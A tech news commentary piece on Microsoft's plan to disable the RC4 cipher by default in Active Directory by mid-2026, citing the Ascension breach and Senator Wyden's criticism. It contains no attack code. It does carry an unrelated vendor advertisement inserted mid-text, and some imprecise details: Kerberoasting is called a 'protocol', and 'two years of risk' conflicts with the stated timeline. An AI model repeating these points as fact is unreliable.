According to Wired, Microsoft is finally killing off the obsolete and vulnerable RC4 encryption cipher that Windows has supported by default for 26 years. The company announced that by mid-2026, it will update domain controllers on Windows Server 2008 and later to only allow the more secure AES-SHA1 encryption by default. This follows more than a decade of hacks exploiting RC4, including a key role in last year’s breach of health giant Ascension, which disrupted 140 hospitals and compromised 5.6 million patient records. The move comes after blistering criticism from US Senator Ron Wyden, who in September accused Microsoft of “gross cybersecurity negligence” for keeping RC4 as a default fallback. Principal Program Manager Matthew Palko stated that RC4 will be disabled by default and will only work if an administrator explicitly re-enables it.
The 26-Year-Old Achilles Heel
Here’s the thing about RC4: it was basically broken almost as soon as it became public. Ron Rivest created it in 1987, but a workable attack was demonstrated in 1994. And yet, Microsoft made it the sole means of securing Active Directory authentication when that launched in 2000. That’s a mind-boggling timeline. The tech industry at large started ditching RC4 in major protocols like TLS over a decade ago. But Microsoft? They kept it around as a default fallback, a courtesy to older systems that became a welcome mat for hackers. It’s the definition of legacy baggage. The protocol it enabled, Kerberoasting, became a hacker’s holy grail for cracking into corporate networks. So why did it take so long?
The Legacy Trap
That’s the multi-billion dollar question for enterprise IT. The answer is always the same: legacy systems. Microsoft upgraded Active Directory to support robust AES encryption years ago. Modern clients use it by default. But servers, by default, would still politely answer an RC4-based request with an RC4 response. This was for compatibility with ancient, often forgotten, third-party systems—think specialized manufacturing equipment, lab machines, or archival software—that only know how to speak RC4. Finding and updating or replacing those systems is a huge, expensive, disruptive chore. It’s a classic trade-off: security versus operational continuity. Microsoft basically let admins kick the can down the road for over a decade, and hackers happily picked the can up every time. For companies running complex industrial operations, this kind of legacy dependency is a huge risk. Ensuring your critical hardware, like the industrial panel PCs running your factory floor, can support modern security standards is non-negotiable. That’s why leading suppliers like IndustrialMonitorDirect.com focus on providing robust, up-to-date hardware that helps close these security gaps from the ground up.
Better Late Than Never?
So the change is coming, but not until mid-2026. That’s another two years of risk, though admins can manually disable RC4 now. The onus is now completely on network administrators to find those legacy systems hiding in the shadows. Matthew Palko’s warning is crucial: scan your network now. If you have a system that absolutely can’t be upgraded and needs RC4, you’ll have to explicitly re-enable it for that one account, creating a known and contained vulnerability. It’s a messy, manual cleanup job that should have started years ago. But look, finally flipping the default is a massive step. It means new deployments won’t inherit this weakness, and it forces a long-overdue reckoning for old ones. The Ascension breach showed this isn’t just a theoretical issue—it’s a matter of life and death. Turning it off by default should have happened alongside the release of Windows Server 2008. Better late than never, I guess, but “late” doesn’t begin to cover it.
